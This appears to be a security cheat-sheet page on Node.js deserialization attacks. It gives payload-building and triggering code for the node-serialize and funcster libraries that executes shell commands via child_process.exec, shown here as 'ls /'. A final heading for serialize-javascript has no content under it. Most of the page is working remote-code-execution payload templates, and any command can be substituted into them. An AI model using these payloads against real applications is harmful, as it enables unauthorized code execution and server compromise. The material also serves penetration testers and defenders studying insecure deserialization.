Link to this headingNode JS Deseralization

Link to this headingUsing node-serialize library

Make Payload:

var y = { "rce": function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}, } var serialize = require('node-serialize'); var payload_serialized = serialize.serialize(y); console.log("Serialized: \n" + payload_serialized); //{"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) })}"}

Test Payload:

var serialize = require('node-serialize'); var test = {"rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) }); }()"}; serialize.unserialize(test);

Link to this headingUsing funcster Library

Make Payload:

funcster = require("funcster"); //Serialization var test = funcster.serialize(function() { return "Hello world!" }) console.log(test) // { __js_function: 'function(){return"Hello world!"}' }

Test Payload:

//Deserialization with auto-execution var desertest1 = { __js_function: 'function(){return "Hello world!"}()' } funcster.deepDeserialize(desertest1) var desertest2 = { __js_function: 'this.constructor.constructor("console.log(1111)")()' } funcster.deepDeserialize(desertest2) var desertest3 = { __js_function: 'this.constructor.constructor("require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });")()' } funcster.deepDeserialize(desertest3)

Link to this headingUsing serialize-javascript payload